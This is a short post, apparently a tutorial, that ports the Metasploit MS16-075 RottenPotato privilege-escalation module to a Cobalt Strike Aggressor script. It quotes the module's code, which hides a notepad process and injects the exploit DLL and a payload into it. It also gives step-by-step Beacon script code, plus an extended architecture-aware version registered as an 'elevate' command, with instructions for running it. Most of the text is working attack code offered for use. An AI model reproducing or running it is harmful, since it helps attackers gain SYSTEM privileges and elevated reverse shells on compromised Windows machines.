A throwaway post... just have a look and move on...
Cortana scripting manual
rottenpotato.dll

Flow

The MSF module

# Excerpt from the exploit method of the Metasploit ms16-075 module
# (from the architecture check onward):
    if my_target.opts['Arch'] == 'x64'
      dll_file_name = 'rottenpotato.x64.dll'
      vprint_status("Assigning payload rottenpotato.x64.dll")
    elsif my_target.opts['Arch'] == 'x86'
      dll_file_name = 'rottenpotato.x86.dll'
      vprint_status("Assigning payload rottenpotato.x86.dll")
    else
      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
    end

    # Spawn a hidden notepad.exe to host the exploit DLL
    print_status('Launching notepad to host the exploit...')
    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Could not open the new process; fall back to the current (Meterpreter) process
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name)
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end # end of the exploit method
end # end of the module class

Flow: pick the DLL matching the target's bitness > spawn a notepad process > inject the privilege-escalation DLL into that process > inject the payload into the same process > call the exploit, which elevates and runs the payload to get a reverse shell

Building the Cortana script

→_→ The manual already gives an example, but I'll still go through it piece by piece; if anything is unclear, read the manual yourself.

  • 1. First pick a listener and generate stager shellcode for it

    btask($1,listener_describe($2));
    $stager = shellcode($2, false, "x64");
  • 2. Use the reflective DLL injection facility CS provides (the stager is passed to the DLL as its parameter)

    bdllspawn!($1, script_resource("rottenpotato.x64.dll"), $stager, "ms16-075", 5000);
    # script_resource() resolves a file path relative to the script's own directory
  • 3. Connect the new shell (stage the payload for the listener)

    bstage($1, $null, $2, "x64");
  • 4. Then wrap it in the template...

    sub ms16_075_exploit
    {
    btask($1,listener_describe($2));
    $stager = shellcode($2, false, "x64");
    bdllspawn!($1, script_resource("rottenpotato.x64.dll"), $stager, "ms16-075", 5000);
    bstage($1, $null, $2, "x64");
    }
    beacon_exploit_register("ms16-075", "test", &ms16_075_exploit);
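The template above hard-codes the x64 DLL, whereas the MSF module picks the DLL from the target architecture and bails out on anything else. The script below is an added example (my own, not the post's script and not the example from the Cobalt Strike manual) that carries that arch check over to the Beacon version. It assumes the Aggressor functions barch (returns "x86" or "x64" for a session) and berror, a hypothetical helper sub ms16_075_dll, and that both rottenpotato.x86.dll and rottenpotato.x64.dll sit next to the .cna file. The bdllspawn! call keeps the five-argument form used on this page; check the manual for your Cobalt Strike version, since the argument list has changed between releases.

```sleep
# Added example: ms16-075 (RottenPotato) elevate command that selects the
# reflective DLL by Beacon architecture, mirroring the MSF module's arch check.
# Assumptions: barch($1) returns "x86" or "x64"; both DLLs sit beside this .cna;
# bdllspawn! takes the same five arguments as in the post.

# hypothetical helper: map an arch string to the DLL file name, $null if unknown
sub ms16_075_dll {
    if ($1 eq "x64") {
        return "rottenpotato.x64.dll";
    }
    else if ($1 eq "x86") {
        return "rottenpotato.x86.dll";
    }
    return $null;
}

sub ms16_075_exploit {
    local('$arch $dll $stager');
    $arch = barch($1);
    $dll  = ms16_075_dll($arch);

    # same failure mode as fail_with(Failure::BadConfig, ...) in the MSF module
    if ($dll is $null) {
        berror($1, "Unknown Beacon arch '" . $arch . "'; not running ms16-075");
        return;
    }

    btask($1, "Tasked beacon to run " . listener_describe($2) . " via ms16-075 (" . $arch . ")");

    # 1. stager shellcode for the chosen listener, matching the Beacon's arch
    $stager = shellcode($2, false, $arch);

    # 2. reflectively load the RottenPotato DLL as a post-ex job; the stager is the
    #    DLL's parameter, 5000 ms is how long the job is waited on before cleanup
    bdllspawn!($1, script_resource($dll), $stager, "ms16-075", 5000);

    # 3. stage/link the new (hopefully SYSTEM) session on the same listener
    bstage($1, $null, $2, $arch);
}

beacon_exploit_register("ms16-075", "RottenPotato local privilege escalation (MS16-075)", &ms16_075_exploit);
```

Load the .cna on the team server and run `elevate ms16-075 <listener>` from a Beacon; an x86 Beacon now gets the x86 DLL and x86 stager instead of being handed x64 artifacts that cannot load.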
